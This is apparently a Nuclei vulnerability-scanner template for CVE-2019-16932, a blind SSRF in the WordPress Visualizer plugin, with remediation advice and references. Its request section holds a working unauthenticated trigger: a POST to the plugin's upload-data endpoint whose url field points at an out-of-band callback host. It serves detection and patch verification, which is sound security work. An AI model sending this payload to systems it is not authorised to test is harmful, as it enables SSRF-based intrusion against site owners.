id: CVE-2019-16932 info: name: Visualizer <3.3.1 - Blind Server-Side Request Forgery author: akincibor severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. impact: | An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage. remediation: | Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability. reference: - https://wpscan.com/vulnerability/9892 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - https://nvd.nist.gov/vuln/detail/CVE-2019-16932 - https://wordpress.org/plugins/visualizer/#developers - https://wpvulndb.com/vulnerabilities/9892 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.37504 epss-percentile: 0.97194 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: themeisle product: visualizer framework: wordpress tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: word internal: true words: - 'Visualizer' - 'Tested up to:' condition: and - method: POST path: - "{{BaseURL}}/wp-json/visualizer/v1/upload-data" body: '{\"url\":\"http://{{interactsh-url}}\"}' headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word name: http part: interactsh_protocol words: - http - type: word part: header words: - application/json - type: status status: - 200 # digest: 4a0a00473045022100d407fe60c184ba02b45f59c43015ebbaad48212d634db3228644ac8aa957d6ca0220740603bfc9c833c922a1777c930cf4776bb81d1aab79496d5963f98f5eb4cfe6:922c64590222798bb761d5b6d8e72950